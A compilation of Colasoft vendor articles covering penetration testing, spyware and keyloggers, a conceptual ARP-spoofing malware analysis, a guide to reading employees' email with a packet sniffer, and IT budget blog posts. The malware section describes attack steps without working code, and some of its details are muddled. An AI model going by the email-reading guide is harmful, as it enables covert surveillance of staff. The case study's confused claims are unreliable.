How to Discover Network Security Loopholes

There is an illusion today towards discovering the loopholes in a network as wonders of global connectivity enfold. Such diversity seems to call for the need for companies to invest more in training their network operators on discovery of Network loopholes. Simultaneously, there also exists at large sophisticated hackers and crackers, who spend sleepless nights contemplating how to accurately discover security loopholes in a network enabling them penetrate through. this call for network security managers who should have the ability to hack into their own systems first.


These few challenges are the main forces driving research on discovering network security loopholes and as technological advances emerge, the cat and mouse game continues between attacker and protectors.

The major method that is being employed in most networks today to discover security loopholes is Penetration Testing as is examined below.

Penetration Testing

This can be defined as a process of actively testing information security measures. Organisations prefer to perform penetration tests to identify the threats facing them and resolving its vulnerabilities and weakness.

There are different types of penetration tests available. They are:

i. External Penetration Testing

The oldest approach of testing and is mainly focused on servers, infrastructure and software present in the target system. This type of testing is usually either performed with no prior knowledge of the site or with total knowledge of how the network topology is.


ii. Internal Security Assessment

This approach is similar to the external penetration testing with the addition of provision of a security report of the site. This testing is typically performed from a number of access points representing the different network segments.


iii. Application Security Assessment

This identifies and asses threats to an organisation through software applications that might provide interactive access to potentially sensitive materials. It is essential that the applications are accessed to ensure that they done expose the servers and the software to attack.

iv. Telephony Security Assessment

This assessment addresses security concerns relating to corporate voice technologies.


v. Social Engineering Security Assessment

This assessment addresses social engineering which is a non technical kind of intrusion.

For more information about Penetration Testing a great website that has lots of information is penetration-testing.com .

Network Analysing

After the penetration testings, it is quite easy to detect and confirm the network problems with a network sniffer/analyzer. With the professional data capturing technology and comprehensive capability of network analyzing, Colasoft Network Analyzer will help you monitor your network within seconds and maximize your network value.

Are You Being Watched?

by Brett Glass -- pcmag.com

How private is your PC data? Thanks to the proliferation of Internet worms and hardware and

software spying tools, the erosion of loyalty between corporations and their employees, and the

9/11 disaster (which has caused many to value security over privacy and civil rights), the

likelihood is greater than ever that your computer is reporting your every move to a suspicious

spouse, a government agency, an employer, or the entire world. In this article, we'll cover the

most prevalent spying hardware and software and explain how it can be used, abused, and

detected.

A hardware key logger is a device that captures keystrokes en route from keyboard to PC.

KeyGhost (www.keyghost.com), a New Zealand company, offers two hardware key loggers. The first is

an inconspicuous cable that runs from the keyboard to the PC (prices start at $139 and go up to

$409 direct). The second is a keyboard with the logging hardware tucked entirely inside the case

($189 and up). The company claims to have a wide variety of bugged keyboards ready-made to match

many brands of computers. If your existing keyboard is unique, KeyGhost will modify it and return

it with the logger hidden inside. Both the internal and external versions have maximum capacities

of about 2MB—enough memory to capture as much as a year's worth of typing. The Spy Store

(www.thespystore.com/pcsurveillance.htm) shows a more compact external key logger ($139 direct).

It has a smaller memory capacity, but its capabilities are otherwise similar.

Hardware key loggers usually can't be detected by software and may be tough for non-technical

users to spot. They're also compatible with most operating systems and don't require complicated

installations. The main drawback is that they can't capture the information that appears on the

screen but isn't typed in by the user. So hardware devices are best used to sniff out small but

vital pieces of information, such as passwords.

Although keystroke-logging hardware is relatively new, software that performs the same

function is not. In 1988, I implemented a primitive network keystroke logger as a DOS TSR, using

the NetBIOS protocol. My motivation at the time was not to spy but to ensure that my programming

work was preserved on another machine in the event of a system crash.

But today's spying programs do much more than log keystrokes. Spying software can be selective

about the data it captures; administrators can set the software to skim information and then

capture more data when certain criteria are met. WinWhatWhere Investigator

(www.winwhatwhere.com), a major product in the monitoring market, captures keystrokes, e-mails

information about your activities when key phrases are entered, and even renames itself and

changes its location at random. If the victim's machine has a Webcam connected, WinWhatWhere

snaps pictures periodically and sends them out surreptitiously.

SpectorSoft (www.spectorsoft.com) makes Spector Pro, which captures screen shots, records e-

mail and chat sessions, and logs keystrokes. In short, if something of interest to you happens on

a user's machine, you will not only know what the person typed, you'll have logs of e-mail and

chat room conversations and pictures of the screen. Competing products such as D.I.R.T., from

Codex Data Systems' (www.codexdatasystems.com/menu.html), offer similar features. And several

keystroke logger programs are freely available for download from many shareware archives. Logging

software is easier to detect via system diagnostic tools, however, and may be wiped off the hard

drive by reconfiguring or reinstalling the operating system.

In some cases, spying software may be installed as a virus, worm, or Trojan horse that arrives

via e-mail or an infected file. BackOrifice, a program created by a group of rogue hackers called

The Cult of the Dead Cow, can be installed in this way and can spy on and even commandeer the

victim's system. Several recent worms, including Badtrans.B, attempt to capture passwords and

credit card information from users' systems and forward the information to the worms' creators

via e-mail or Internet relay chat (IRC).

Another spying technique uses a network sniffer (usually a computer running special software)

installed on the same LAN as the victim's computer or upstream between the victim's computer and

the Internet. The sniffer taps and records the raw data flowing between the victim and other

machines; this data can be scanned later.

Only a few Internet protocols use encryption. E-mail is most often sent and retrieved as plain

text, and the password needed to break into someone's electronic mailbox is very rarely

encrypted. If encryption is used, a key logger can often be used to discover the password that

unlocks the data.

The FBI's Carnivore system, which is installed at ISP facilities to collect evidence, is one

example of a network sniffer. Civilian tools that can sniff LAN traffic—even on networks

supposedly protected from monitoring by network switches—are widely available for free via the

Internet.

Even if the party who wants to spy on you has no physical access to your network, you cannot

necessarily rest easy. A cracker who manages to gain control of any vulnerable system on your

network can set it up to sniff traffic from the rest of the network. And recently revealed bugs

in most implementations of SNMP (Simple Network Management Protocol) may provide an easy way for

intruders to take over managed hubs and switches, routers, print servers, and network appliances.

(For more on these bugs, see the CERT advisory.)

Case Study: ARP spoofing HTTP infection malware

This year, we've seen many ARP spoofing viruses, also known as ARP cache-poisoning viruses. This type of malware comes in many variants and is widely spread in China. Recently, we uncovered an ARP spoofing virus that exhibits several new features.

The new ARP spoofing virus inserts a malicious URL into the session of an HTTP response, thus including significant malicious content, and then exploits Internet Explorer. At the same time, the virus makes a poisoned host act as an HTTP proxy server. When any machine in the same subnet with the poisoned machine accesses the Internet, the traffic goes through the poisoned machine.

Let's take a detailed look at the features of the latest ARP spoofing virus.

This type of virus replaces the MAC address of the Gateway machine with the MAC address of the poisoned machine. The following screen shows the correct Gateway MAC address:


When we run the ARP spoofing virus, the Gateway MAC address is changed, as shown in the following diagram. The real Gateway MAC address is changed by the poisoned machine to the MAC address of the poisoned machine. Please review the following diagram.


Now let's view a detailed virus analytic report

The following diagram shows the mechanism used by this type of virus. Normally, when we open a Web page, the traffic goes to the Gateway machine directly (see pathway 4). But if the local network is infected by an ARP spoofing virus, the traffic goes through the poisoned machine before it goes to the Gateway, as indicated by pathway 5 and pathway 6 below:


The following steps describe what occurs.

First step: The poisoned machine broadcasts ARP spoofing packets saying "I am the Gateway"

Second step: Each machine in the subnet receives an ARP spoofing packet and updates its ARP table, so the ARP cache is poisoned.

Third step: A machine accesses the Internet through the poisoned machine, then the poisoned machine routes this HTTP packet through the Gateway (the poisoned machine uses a Net driver, such as wpcap.dll or WanPacket.dll, to get network traffic).

Fourth step: The Gateway inserts a malicious URL into the HTTP response packet. Then it sends the malicious packet to the object machine.
In the following code, we see how the virus inserts a malicious link:


In the shown code above, we can see partial IP address information. The information comes from the author's network environment, which is similar to the following:
0000b3b0 255.255.255.0
subnet mask
0000b3c0 10.xx.xx.58
poisoned machine IP address
0000b840 10.xx.xx.1
correct Gateway address
0000b850 10.xx.xx.*

subnet information

When the virus obtains this data, it scans the local subnet and then sends ARP spoofing packets to machines in the local subnet.
Let's see how the virus implements these functions:


In the code above, the virus calls a system dll file (iphlpapi.dll) to get general information about the local network adapter. The iphlpapi.dll file is a module containing the functions used by the Windows IP Helper API. When the virus gets the local network adapter information, the virus can make spoofing ARP packet. The following graphic shows detailed code:


We used OllyDbg to trace the virus into the Windows system space, and we obtained the code above. When we introduced this virus here, we needed some background knowledge. The virus uses Colasoft Capsa to capture network traffic and insert malicious Web code into the HTTP response.

Why should we monitor the network conversation?

In a network group, especially for the company, enterprise, school, bank, NSA, etc, the confidential information is very very important, and may very dangerous if they are divulged.

And also, for a company/enterprise boss, he can get the information of what his staff are talking about via internet, no matter they are using MSN, Yahoo, Gtalk, ICQ, AIM…or Email Webmail…at any time.

Under this situation, we need a network monitor/packet sniffer, not only to monitor the network conversation, but also to guarantee our network security for prevent it from dangerous beforehand.

Resolution
Take Colasoft Capsa 6.9 for example, We will show you how to monitor the email activity & content with it step-by-step:

1. Choose “Logs” from the main window.


2. As shown in the following illustration, there’s a pop up window for changing settings after you choose the “Logs”.
Email Log→Log File Settings, then change the settings indicated by an arrow.


3. Choose Email Messages in the Logs view, you can find the detail information on all the email activities.


4. Just double-click the crossband, then you can check out the content of any email you want to read.


Conclusion:

For every organization, institution, company, enterprise…etc, the confidential information is very important that are never allowed to be leaked out.

Except the traditional File Encryption, Video Surveillance, what can we do if we are in a huge network? Under this situation, a powerful packet sniffer/network analyzer is quite a good right-hand.

14 Tips to Protect Your Organization's Network

Network security is an infinitely complex and dynamic subject, implementing these simple measures will go a long way to protecting your Organization's LAN.

1, Run Network Analyzer Frequently.Recommend an easy-to-use network analyzer, Colasoft Capsa.

2, Disable drives:Disable floppy drive access, USB ports and serial ports on networked computers.

3, Restrict Permissions: Windows 2000 and 2003 server allow you to set permissions so that users can't run downloaded 'exe' or other executable files.

4, Block Instant Messenger:IM and its cousins, ICQ and Yahoo Messenger, sends messages and attachments out to a server and then back to its clients. You lose control when this happens.

5, Password Protect Your BIOS:A BIOS without an administrator password is an invitation to mischief.

6, Run AV Software: Run anti-virus software on all your computers.

7, Build Your Defenses: Install a firewall or a proxy server.

8, Beware Of Attachments From Unknown, Untrusted Sources:Do not open attachments to email unless you trust the sender.

9, Monitor Your Ports:Install a port monitor to prevent your ports from being scanned.

10, Encrypt Wireless Access.

11, Keep Back Office Systems Off The Organization Network

12, Require passwords to be changed frequently

13, Use CTRL+ALT+DEL to logon

14, Keep your networking skills up to date.

5 Things Our IT Department had to skip

In last blog, we have talked about the 5 items our IT department must do even in the big recession, in addition to the things we can't do without, there are many more things we had to skip. We are not exactly happy to stop doing these things but desperate times cry for desperate measures and since these activities are something we can do without we had to either quit them, or drastically reduce them:

• No purchases of new hardware. Though it is not precise to say that we haven't bought a single piece of hardware in the last year, we have definitely cut hardware spendings. For the time being we do not plan to make major hardware purchases.

• Capital expenditures. Capital expenditures are another budget item we had to drastically shrink. We had schedules projects but the current economic situation made us have second thoughts and now capital expenditures are on hold.

• Software that is nice to have but we can do without it. Similarly to hardware and capital expenditures, some major software expenses had to be cut. Yes, there are many products, for instance accounting, HR, or ERP modules, which are great to have but we'll go for them when the economic outlook is less gloomy.

• Standardization. You know that IT people generally hate when they have to deal with bureaucracy and standardization, so if there is an item, we are happy to skip, this is standardization. More or less we skipped all standardization-related activities except those, that are related to regulations compliance. Standardization is put on hold, especially if it requires investment or other resources.

• No infrastructure upgrades. We are not exactly happy about this one but since there are more important items we can't skip, we had to significantly reduce the planned network upgrades. Some of the projects in this area are put on hold, while others are canceled.

It wasn't easy to decide what to skip and what to keep but when times are tough, it is not possible to pretend that everything is OK and go on as planned. We hope that we are right in our choices and time will show if we did wise choices or not.

James Ackland is Author of this article from www.Colasoft.com.

About Colasoft Co., Ltd.
Ever since 2001, Colasoft has been dedicated in providing all-in-one and easy-to-use network sniffer software for network administrators and IT managers to monitor network activities, analyze network performance, enhance network security, and troubleshoot network problems. Up to now, more than 5000 customers in over 70 countries trust the flagship product – Colasoft Network Sniffer as their network monitoring and troubleshooting solution. Colasoft also offers four free network utilities: Colasoft Packet Builder, Colasoft Packet Player, Colasoft MAC Scanner, and Colasoft Ping Tool. Learn more about Colasoft and its solutions, please visit http://www.colasoft.com/.

Top 5 Items Our IT Department Must Do

Even though it is a basic economic fact that recessions happen once or twice in a decade, when the economy is in a good shape, like it was a couple of years ago, people, including IT managers, tend to forget that the summer will be over and hard times will come soon. On the other hand, recessions might be bad but the current one is certainly worse than many of the ones before. Actually, this is the worst recession since the Great Depression in the 1930s and even the most optimistically-minded managers have really serious reasons to fear and be cautious.

We can't say that the recession took us by surprise but certainly we didn't expect it to be that fierce. However, recession or no recession, life must go on and if a company wants to make it, there are many things which can't be skipped. So, no matter that IT budgets are tight, there are items a company can't save on. Here are the top 5 items our IT department will not sacrifice:

1, Network security and security in general. Being in the network security business themselves, we know that network security and security in general is paramount and no matter how hard the economic situation might be, this is not an item to save on because the price is too high. Certainly, we are not buying the most expensive solutions, even though they are incredibly great but we also do not make compromises with the quality either.

2, Going green. Going green is also an item we can't skip. Green technology saves money and now this benefit is more important than ever. So, if we buy new IT stuff, we definitely go for the green items.

3, Compliance. Regulations compliance is another item we can't afford to skip, unless we really want to go out of business (and we don't). So, when there are steps in this direction to be taken, we do them – no way!

4, Training. Training is also important and even though our training budget has shrunk, we still try to keep our staff qualified.

5, Outsourcing. Outsourcing has been a successful strategy for our company at all times and now, when money issues start to surface, we are happy that outsourcing helps us cut cost with no sacrifice of quality.

Kevin Chou is Author of this article from www.Colasoft.com.

About Colasoft Co., Ltd.
Ever since 2001, Colasoft has been dedicated in providing all-in-one and easy-to-use network sniffer software for network administrators and IT managers to monitor network activities, analyze network performance, enhance network security, and troubleshoot network problems. Up to now, more than 5000 customers in over 70 countries trust the flagship product – Colasoft network sniffer as their network monitoring and troubleshooting solution. Colasoft also offers four free network utilities: Colasoft Packet Builder, Colasoft Packet Player, Colasoft MAC Scanner, and Colasoft Ping Tool. Learn more about Colasoft and its solutions, please visit http://www.colasoft.com/.